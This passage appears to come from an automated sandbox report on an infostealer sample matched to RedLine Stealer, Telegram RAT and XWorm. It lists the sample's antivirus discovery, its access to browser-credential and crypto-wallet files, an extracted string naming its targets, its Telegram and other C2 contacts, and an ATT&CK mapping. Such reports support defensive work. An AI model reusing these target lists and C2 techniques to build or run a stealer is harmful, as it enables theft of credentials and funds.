                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe VolumeInformationJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformationJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_00411104 GetSystemTime,SystemTimeToFileTime,0_2_00411104
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_00409B26 GetVersionExW,0_2_00409B26
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: YsrQekGS.exe, 00000004.00000002.2940564009.000000001C290000.00000004.00000020.00020000.00000000.sdmp, YsrQekGS.exe, 00000004.00000002.2937204022.000000001B7D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected RedLine Stealer
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 2.0.wjoqZlIS.exe.900000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Ekpb7jn7mf.exe PID: 6356, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: wjoqZlIS.exe PID: 6528, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, type: DROPPED
                            Yara detected Telegram RAT
                            Source: Yara matchFile source: Process Memory Space: YsrQekGS.exe PID: 6564, type: MEMORYSTR
                            Yara detected XWorm
                            Source: Yara matchFile source: 4.0.YsrQekGS.exe.4b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.2912640995.0000000002756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Ekpb7jn7mf.exe PID: 6356, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: YsrQekGS.exe PID: 6564, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, type: DROPPED
                            Found many strings related to Crypto-Wallets (likely being stolen)
                            Source: Ekpb7jn7mf.exe, 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectrumRule
                            Source: Ekpb7jn7mf.exe, 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: JaxxxLibertyAfihkakfobkmkjojpchpfgcmhfjnmnfpi
                            Source: wjoqZlIS.exe, 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                            Source: Ekpb7jn7mf.exe, 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusRule
                            Source: powershell.exe, 0000000A.00000002.1759686805.000002174EF13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                            Tries to steal Crypto Currency Wallets
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                            Source: Yara matchFile source: 2.0.wjoqZlIS.exe.900000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Ekpb7jn7mf.exe PID: 6356, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: wjoqZlIS.exe PID: 6528, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Yara detected RedLine Stealer
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 2.0.wjoqZlIS.exe.900000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Ekpb7jn7mf.exe PID: 6356, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: wjoqZlIS.exe PID: 6528, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, type: DROPPED
                            Yara detected Telegram RAT
                            Source: Yara matchFile source: Process Memory Space: YsrQekGS.exe PID: 6564, type: MEMORYSTR
                            Yara detected XWorm
                            Source: Yara matchFile source: 4.0.YsrQekGS.exe.4b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.2912640995.0000000002756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Ekpb7jn7mf.exe PID: 6356, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: YsrQekGS.exe PID: 6564, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                            Windows Management Instrumentation                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		11
                            Disable or Modify Tools                            		1
                            OS Credential Dumping                            		1
                            System Time Discovery                            		Remote Services11
                            Archive Collected Data                            		1
                            Web Service                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts12
                            Native API                            		Boot or Logon Initialization Scripts1
                            Access Token Manipulation                            		11
                            Deobfuscate/Decode Files or Information                            		1
                            Input Capture                            		2
                            File and Directory Discovery                            		Remote Desktop Protocol3
                            Data from Local System                            		1
                            Ingress Tool Transfer                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts2
                            Command and Scripting Interpreter                            		Logon Script (Windows)11
                            Process Injection                            		21
                            Obfuscated Files or Information                            		Security Account Manager137
                            System Information Discovery                            		SMB/Windows Admin Shares1
                            Input Capture                            		11
                            Encrypted Channel                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal Accounts1
                            PowerShell                            		Login HookLogin Hook21
                            Software Packing                            		NTDS341
                            Security Software Discovery                            		Distributed Component Object Model1
                            Clipboard Data                            		11
                            Non-Standard Port                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Timestomp                            		LSA Secrets1
                            Process Discovery                            		SSHKeylogging3
                            Non-Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            DLL Side-Loading                            		Cached Domain Credentials241
                            Virtualization/Sandbox Evasion                            		VNCGUI Input Capture14
                            Application Layer Protocol                            		Data Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                            Masquerading                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job241
                            Virtualization/Sandbox Evasion                            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                            Access Token Manipulation                            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                            Process Injection                            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1474423 Sample: Ekpb7jn7mf.exe Startdate: 16/07/2024 Architecture: WINDOWS Score: 100 40 api.telegram.org 2->40 42 pst-child.gl.at.ply.gg 2->42 44 api.ip.sb 2->44 68 Snort IDS alert for network traffic 2->68 70 Found malware configuration 2->70 72 Malicious sample detected (through community Yara rule) 2->72 76 18 other signatures 2->76 9 Ekpb7jn7mf.exe 10 2->9         started        13 Calculator.exe 2 2->13         started        signatures3 74 Uses the Telegram API (likely for C&C communication) 40->74 process4 file5 34 C:\Users\user\AppData\Local\...\wjoqZlIS.exe, PE32 9->34 dropped 36 C:\Users\user\AppData\Local\...\rKPaQokQ.exe, PE32+ 9->36 dropped 38 C:\Users\user\AppData\Local\...\YsrQekGS.exe, PE32 9->38 dropped 82 Found many strings related to Crypto-Wallets (likely being stolen) 9->82 15 YsrQekGS.exe 14 3 9->15         started        19 wjoqZlIS.exe 15 48 9->19         started        21 rKPaQokQ.exe 12 9->21         started        signatures6 process7 dnsIp8 46 api.telegram.org 149.154.167.220, 443, 49745 TELEGRAMRU United Kingdom 15->46 48 45.88.186.18, 49746, 7000 ANONYMIZEEpikNetworkCH Netherlands 15->48 52 Antivirus detection for dropped file 15->52 54 Multi AV Scanner detection for dropped file 15->54 56 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 15->56 66 4 other signatures 15->66 23 powershell.exe 15->23         started        26 powershell.exe 15->26         started        50 pst-child.gl.at.ply.gg 147.185.221.20, 49730, 49737, 49738 SALSGIVERUS United States 19->50 58 Found many strings related to Crypto-Wallets (likely being stolen) 19->58 60 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 19->60 62 Tries to harvest and steal browser information (history, passwords, etc) 19->62 64 Tries to steal Crypto Currency Wallets 19->64 28 conhost.exe 19->28         started        signatures9 process10 signatures11 78 Found many strings related to Crypto-Wallets (likely being stolen) 23->78 80 Loading BitLocker PowerShell Module 23->80 30 conhost.exe 23->30         started        32 conhost.exe 26->32         started        process12

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            Ekpb7jn7mf.exe66%ReversingLabsByteCode-MSIL.Infostealer.RedLine
                            Ekpb7jn7mf.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
